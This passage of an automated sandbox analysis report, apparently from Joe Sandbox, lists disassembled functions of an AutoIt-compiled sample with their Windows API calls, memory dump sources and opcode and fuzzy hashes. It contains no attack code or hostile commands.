                                                                                        • ShowWindow.USER32(00000000,00000004,?,0048B5A8,?,?), ref: 0048B7A8
                                                                                        • EnableWindow.USER32(00000000,00000001), ref: 0048B7CC
                                                                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0048B7EF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 642888154-0
                                                                                        • Opcode ID: 7ca0fe6c9807323bcc0ac8ff00a913c3fb6576fd02a22b3a16232a66ac7b93cd
                                                                                        • Instruction ID: 1d3b34d551e73e97491640bec01ce8c12bc83bc2c135b759935fb039f22faf4f
                                                                                        • Opcode Fuzzy Hash: 7ca0fe6c9807323bcc0ac8ff00a913c3fb6576fd02a22b3a16232a66ac7b93cd
                                                                                        • Instruction Fuzzy Hash: 1941A834600340AFDB21DF28C499B9A7BE0FF49310F5845BAF9488F762C735A856CB94
                                                                                        Function 0047709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,00474E41,?,?,00000000,00000001), ref: 004770AC
                                                                                          • Part of subcall function 004739A0: GetWindowRect.USER32(?,?), ref: 004739B3
                                                                                        • GetDesktopWindow.USER32 ref: 004770D6
                                                                                        • GetWindowRect.USER32(00000000), ref: 004770DD
                                                                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0047710F
                                                                                          • Part of subcall function 00465244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC
                                                                                        • GetCursorPos.USER32(?), ref: 0047713B
                                                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00477199
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                        • String ID:
                                                                                        • API String ID: 4137160315-0
                                                                                        • Opcode ID: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
                                                                                        • Instruction ID: 96178dbc809958a90b6454061f905f6e8cc6bb80431ab620535fad6e804f8cbf
                                                                                        • Opcode Fuzzy Hash: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
                                                                                        • Instruction Fuzzy Hash: 2131D472605305ABD720DF14D849B9FB7A9FF88314F40092EF58997291D734EA09CB9A
                                                                                        Function 00458879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
                                                                                          • Part of subcall function 004580A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
                                                                                          • Part of subcall function 004580A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
                                                                                          • Part of subcall function 004580A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
                                                                                          • Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6
                                                                                        • GetLengthSid.ADVAPI32(?,00000000,0045842F), ref: 004588CA
                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 004588D6
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 004588DD
                                                                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 004588F6
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,0045842F), ref: 0045890A
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00458911
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                        • String ID:
                                                                                        • API String ID: 3008561057-0
                                                                                        • Opcode ID: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
                                                                                        • Instruction ID: 7059436e0a451666cc74b436c7695f43cca8d294219cfb63d8684b6348989bdb
                                                                                        • Opcode Fuzzy Hash: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
                                                                                        • Instruction Fuzzy Hash: 8E11AF71501609FFDB109FA4DC09BBFB7A8EB45316F10442EE845A7211CF3AAD18DB69
                                                                                        Function 004585B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004585E2
                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004585E9
                                                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004585F8
                                                                                        • CloseHandle.KERNEL32(00000004), ref: 00458603
                                                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00458632
                                                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00458646
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                        • String ID:
                                                                                        • API String ID: 1413079979-0
                                                                                        • Opcode ID: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
                                                                                        • Instruction ID: 159165bab53b04d3cbba9e0d8ed23f629fb96fbb8b96a1f823f3c86320dce82d
                                                                                        • Opcode Fuzzy Hash: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
                                                                                        • Instruction Fuzzy Hash: 7111597250120DBBDF018FA4DD49BEF7BA9EF08305F144069FE04A2161CB769E69EB64
                                                                                        Function 0045B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 0045B7B5
                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0045B7C6
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0045B7CD
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0045B7D5
                                                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0045B7EC
                                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0045B7FE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDevice$Release
                                                                                        • String ID:
                                                                                        • API String ID: 1035833867-0
                                                                                        • Opcode ID: e8a4a266755e065bcf82882bab04b7313908cea5161a3f7747e2bdf77f2db466
                                                                                        • Instruction ID: ebab011a078b8c66a555392ea924b50fda774449f62ca66a232c327e230173f3
                                                                                        • Opcode Fuzzy Hash: e8a4a266755e065bcf82882bab04b7313908cea5161a3f7747e2bdf77f2db466
                                                                                        • Instruction Fuzzy Hash: ED018475E00209BBEF109BE69C49A5EBFB8EB48711F00407AFE04A7291D6309C14CF94
                                                                                        Function 00420162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
                                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
                                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
                                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
                                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual
                                                                                        • String ID:
                                                                                        • API String ID: 4278518827-0
                                                                                        • Opcode ID: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
                                                                                        • Instruction ID: 92342a6601e26d0a7fde7352a7d9a4d166513956845c1039e3d7dfd742296845
                                                                                        • Opcode Fuzzy Hash: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
                                                                                        • Instruction Fuzzy Hash: BC016CB09017597DE3008F5A8C85B56FFA8FF19354F00411FA15C87941C7F5A868CBE5
                                                                                        Function 004653E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004653F9
                                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0046540F
                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 0046541E
                                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046542D
                                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00465437
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046543E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                        • String ID:
                                                                                        • API String ID: 839392675-0
                                                                                        • Opcode ID: 0a014705f4b9eef04d7cbb572d47effba07f9213880d12d67749b825beda7cb3
                                                                                        • Instruction ID: 8521796c5e9ebcca20b77e734ec20d152baa00e403791343a5e797bd2ed800e1
                                                                                        • Opcode Fuzzy Hash: 0a014705f4b9eef04d7cbb572d47effba07f9213880d12d67749b825beda7cb3
                                                                                        • Instruction Fuzzy Hash: 7EF06231240558BBD3215B929C0DEAF7A7CEFC6B11F00057DF904D1050EBA41A0587B9
                                                                                        Function 00467230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 00467243
                                                                                        • EnterCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467254
                                                                                        • TerminateThread.KERNEL32(00000000,000001F6,?,00410EE4,?,?), ref: 00467261
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00410EE4,?,?), ref: 0046726E
                                                                                          • Part of subcall function 00466C35: CloseHandle.KERNEL32(00000000,?,0046727B,?,00410EE4,?,?), ref: 00466C3F
                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00467281
                                                                                        • LeaveCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467288
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                        • String ID:
                                                                                        • API String ID: 3495660284-0
                                                                                        • Opcode ID: 007701f69a9d5ed9de85b122c5e4605bf6e21b132c868c5f449004ca5f003f85
                                                                                        • Instruction ID: 24fb6cd7f7b8029ee4f25158e92bed301f8e8da2948c51d11c28ada49318010c
                                                                                        • Opcode Fuzzy Hash: 007701f69a9d5ed9de85b122c5e4605bf6e21b132c868c5f449004ca5f003f85
                                                                                        • Instruction Fuzzy Hash: DDF08236540A12EBD7111B64ED4C9DF7739FF45702B1009BAF503A10A0DB7F5819CB59
                                                                                        Function 00458992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0045899D
                                                                                        • UnloadUserProfile.USERENV(?,?), ref: 004589A9
                                                                                        • CloseHandle.KERNEL32(?), ref: 004589B2
                                                                                        • CloseHandle.KERNEL32(?), ref: 004589BA
                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 004589C3
                                                                                        • HeapFree.KERNEL32(00000000), ref: 004589CA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                        • String ID:
                                                                                        • API String ID: 146765662-0
                                                                                        • Opcode ID: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
                                                                                        • Instruction ID: 8deadb4208ce055a946e280c670b0e99f3db2db319c6731f307d9ea981cf4585
                                                                                        • Opcode Fuzzy Hash: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
                                                                                        • Instruction Fuzzy Hash: 94E0C236004401FBDA011FE1EC0C90ABB69FB89322B108A38F219C1074CB32A828DB58
                                                                                        Function 00457530 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 004576EA
                                                                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457702
                                                                                        • CLSIDFromProgID.OLE32(?,?,00000000,0048FB80,000000FF,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457727
                                                                                        • _memcmp.LIBCMT ref: 00457748
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: FromProg$FreeTask_memcmp
                                                                                        • String ID: ,,I
                                                                                        • API String ID: 314563124-4163367948
                                                                                        • Opcode ID: 53af9984063fa6ef4835f0a7eecfa6d9f4e13870cce121d0ca34c6a3126d00ff
                                                                                        • Instruction ID: be765e1d57b8148d1cf66b3d68047348fb9be163096bbb02cdfcec4a4c199039
                                                                                        • Opcode Fuzzy Hash: 53af9984063fa6ef4835f0a7eecfa6d9f4e13870cce121d0ca34c6a3126d00ff
                                                                                        • Instruction Fuzzy Hash: 08815D71A00109EFCB00DFA4D984EEEB7B9FF89315F204469F505AB251DB75AE0ACB64
                                                                                        Function 004785ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 00478613
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00478722
                                                                                        • VariantClear.OLEAUT32(?), ref: 0047889A
                                                                                          • Part of subcall function 00467562: VariantInit.OLEAUT32(00000000), ref: 004675A2
                                                                                          • Part of subcall function 00467562: VariantCopy.OLEAUT32(00000000,?), ref: 004675AB
                                                                                          • Part of subcall function 00467562: VariantClear.OLEAUT32(00000000), ref: 004675B7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                        • API String ID: 4237274167-1221869570
                                                                                        • Opcode ID: 332034fd6ca578468b57f7b7a1e811b17ad40028d9d2093941ac43483d342d7e
                                                                                        • Instruction ID: 60eff2204552638baa50968c5b1ec12482493ff8819337d84e8636a8f0030324
                                                                                        • Opcode Fuzzy Hash: 332034fd6ca578468b57f7b7a1e811b17ad40028d9d2093941ac43483d342d7e
                                                                                        • Instruction Fuzzy Hash: E1916D756043019FC710EF25C48499BB7E4EF89718F14896EF88A9B3A2DB34ED06CB56
                                                                                        Function 00462A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                                                        • _memset.LIBCMT ref: 00462B87
                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462BB6
                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462C69
                                                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00462C97
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                        • String ID: 0
                                                                                        • API String ID: 4152858687-4108050209
                                                                                        • Opcode ID: b89093a998e3cf012ea480837d41f08897d95beaf01e83ce83b987816d7c9aa6
                                                                                        • Instruction ID: 8d65d54c91bb2834d650baaa5c58db0a2d3f708132dab7008ae6ceb83fe6ffca
                                                                                        • Opcode Fuzzy Hash: b89093a998e3cf012ea480837d41f08897d95beaf01e83ce83b987816d7c9aa6
                                                                                        • Instruction Fuzzy Hash: BF51DD71208B01AED7249E28DA44A6F77E8EF44314F040A2FF880D7291EBB8DC44875B
                                                                                        Function 00413137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
